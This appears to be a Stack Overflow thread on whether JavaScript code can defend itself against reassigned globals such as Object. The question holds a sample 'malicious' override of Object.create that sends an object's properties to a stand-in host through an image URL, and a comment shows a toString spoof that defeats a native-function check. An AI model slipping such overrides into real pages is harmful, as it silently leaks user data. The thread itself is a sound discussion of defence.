# Is it safe to rely on global native objects in JavaScript, particularly the Object one?

Tags: javascript, security, global-variables, javascript-objects

First, I know, that relying on the `Array` constructor is usually frowned because it can be reassigned by other code, which is not in a strict mode, and instead one should use an array literal `[]`, in that case he always relies on the native, real Array (there are a couple of another implications but this is the main)

But how to deal with the `Object`? There are some methods (`create`, `freeze` etc.) which can be accessed only through the `Object` identifier.

I looked to source code of AngularJS and saw, that there authors rely on an assumption that these objects (`Object`, `Function`) would not be reassigned, so I've concluded that there is no better way. But I would like to listen to an opinion of more experienced people.

So the question is: How to protect own code intended to be used abreast with other javascript code from reassigned global native objects?

**UPDATE**

My question is about security concerns. So it is about a situation where a developer cannot assume that:

- if Object is reassigned then nothing else will work properly, so don't worry
- the site administrator would properly test what he includes on his site
- if Object has some method and it returns what it is expected, then everything is ok

Please, consider this situation as an example:

```
// the malicious code
var oldObj = Object,
    Object = {
        create: function(proto) {
            var secretProps = 'http://malicioushost.com/?'
            for (var prop in proto) {
                secretProps += encodeURIComponent(prop) + '=' + encodeURIComponent(proto[prop]) + '&'
            }
            var secretImg = document.createElement('img')
            secretImg.src = secretProps
            document.body.appendChild(secretImg)
            return oldObj.create.call(oldObj, proto)
     }
}

// the non-malign code
var foo = Object.create({prop1: 'foo', prop2: 'bar'})
```

here Object.create behaves exactly as the original one

Appreciate it sincerely.

Comment: Use module system, ideally the revealing module pattern to protect code from outside. http://addyosmani.com/resources/essentialjsdesignpatterns/book/

Comment: You'll want to have a look at https://developers.google.com/caja/

Comment: @XGreen sorry, I didn't grasp it. Let's assume that I need to create a library, which is intended to use with other code. I do not have any access to that code. If it is executed before mine and reassign `Object`, then mine will not work properly

Comment: Which Object are we talking about?

Comment: @XGreen about the global Object. I can access it via the `Object` identifier, but if it was reassigned, for instance `Object = true` or another object or function or whatever, then I would not have access to the native Object

Comment: I would say that's ok. As a library developer you rely on the standards of the language to be respected across applications that will use your library. Furthermore it is highly communicated that modifying native JavaScript objects is bad practice and creates confusion for future developers etc. If someone's code start with Object.create = function(){ alert("bla") } and then your library fails then that's their problem not yours. And they clearly don't deserve your super hero library mate ;)

Comment: @XGreen , my original worry is about some malicious code etc., where these modifications can be created in purpose to do something nasty.

Comment: That depends on the purpose of your library. So for example if its like jQ or lodash then people won't be able to do more malicious things with it than they already can with JavaScript. But if it's a highly sensitive banking system frontend library etc. they there are many techniques to know whether the front is dodgy or not. And also depends on who you think would want to carry out the attack e.g. users or other developers.

Comment: One extremely paranoid measure in such cases could be that you run a test on the functionality you will rely on and if they all pass your test then you ask the server to send the library. Some banks even check the dom few times so it matches exactly the elements it was initially sent by the server.

Comment: @XGreen I've added an example where I cannot assume that if Object's method returns what it is expected, then everything is fine

Comment: I would overhaul the project and seriously reflect on why you have come to the conclusion that you need to override the language to make your library.

Your implementation of Object.create has nothing to do with what the JS language intends.

Comment: @XGreen i do not overwrite the language. This example means possible malicious code, which is included on a page not by me and executed before my code, which relies on `Object.create`

Comment: Ok Got it now. Will add an answer now

Comment: What's the exact attack vector? What are you trying to protect? Who is in charge (control) of the website (server)?

Answer (score 1, accepted):

> First, I know, that relying on the Array constructor is usually frowned because it can be reassigned by other code

Nah. The reason the `Array` constructor is frowned upon is because it's unnecessarily wordier than just saying `[]` and the interface is confusingly inconsistent. (Specifically, `new Array(x).length` is `x` if `x` is a Number, and `1` for any other type... ugh.)

There are some libraries that try to grab their own copies of some globals so that they still work if the host page happens to define its own variable called `Object` or `undefined`, but it's not watertight by any means.

> How to protect own code intended to be used abreast with other javascript code from reassigned global native objects?

This is not a solvable problem. JavaScript doesn't provide sufficient tools to establish an effective security boundary. Pretty much all objects, methods and properties can be sabotaged.

(At a language level, anyway... with a browser you may be able to do something with keeping code in different contexts using cross-domain frames/sandbox, `postMessage` and so on. But if the interface elements the user is interacting with happen on a compromised top-level page it's still unlikely to help much.)

Answer (score 1):

I'm not sure what the language spec says, but from this I'd say probably not. However, I'd also say that if someone is messing around with your JavaScript environment in this way then you don't have a consistent enough environment to get anything worthwhile done anyway, and thus worrying about it isn't worthwhile.

```js
var d,
  origObj,
  o1,
  o2,
  o3;

origObj = Object;

d = document.getElementById('objectorno');
d.innerHTML = Object;

o1 = Object.create({});
d.innerHTML = d.innerHTML + '<br/><br/>' + o1;

Object = null;

d.innerHTML = d.innerHTML + '<br/><br/>' + Object;

o2 = {
  aprop: "this is a property of an object"
};
d.innerHTML = d.innerHTML + '<br/><br/>' + o2.aprop;

try {
  o3 = Object.create({});
  d.innerHTML = d.innerHTML + '<br/><br/>' + o3;
} catch (e){
  d.innerHTML = d.innerHTML + '<br/><br/>No more Object.create()';
}
```

```html
<div id="objectorno"></div>
```

Comment: thank you, but my original worry is about some malicious code etc., where these modifications can be created in purpose to do something nasty.

Comment: @user907860 Surely if someone has obtained enough access to change your base `Object` then you've already got a malicious code vulnerability?

Comment: Yes, but I would like to make my product more robust. So that if my code acquires any sensitive data it does not compromise it even in such a case.

Answer (score 0):

If you need to check whether native code are in fact native and have not been overwritten you can simply check them like this before you use them:

```
function isFuncNative(f) {
       return !!f && (typeof f).toLowerCase() == 'function' 
       && (f === Function.prototype 
       || /^\s*function\s*(\b[a-z$_][a-z0-9$_]*\b)*\s*\((|([a-z$_][a-z0-9$_]*)(\s*,[a-z$_][a-z0-9$_]*)*)\)\s*{\s*\[native code\]\s*}\s*$/i.test(String(f)));
}
```

then

```
if (isFuncNative(Object.create)){
    // Use Object.create
} else {
   alert("You naughty boy!");
}
```

Comment: thank you, but unfortunately, this does not work. If a miscreant will do this: `Object.create.toString = function() {return 'function create() { [native code] }'}` , not mention that the behaviour of the Function.toString method, as far as I know, is not specified exactly

Comment: As Klors mentioned. Probably it's more worthwhile to make your server more secure so an attacker doesn't get file access to it and be able to change the object.create implementation in the first place. The road you are on now is a very deep hole which starts with having file access. Even if you think of everything what stops an attacker with access to your server not to change your comprehensive front end security checker?

Comment: I do not have access to any server. I'm developing a library, which possibly can be used in some business apps, for instance online stores. And I would like to make it more "bulletproof", even if a user installed some malicious php plugin on his site

Comment: @user907860: It's not your library's job to provide such security. The user himself needs to care about the security of his server - and if it is compromised, your (js) library will not be able to do anything against that.

Comment: @Bergi , I appreciate your reply, it's like a bolster to my original suspicion that I can do nothing in this case, considering the fact that even Google didn't either. But I cannot concede that one should not at least to think about doing anything in this or similar situations. It like the case with the bug with json responses in a form of an array literal: Though it is recommended to server-side developers to return responses in the object notation form, one can say "It is not my job to provide such security, if a user uses an old browser".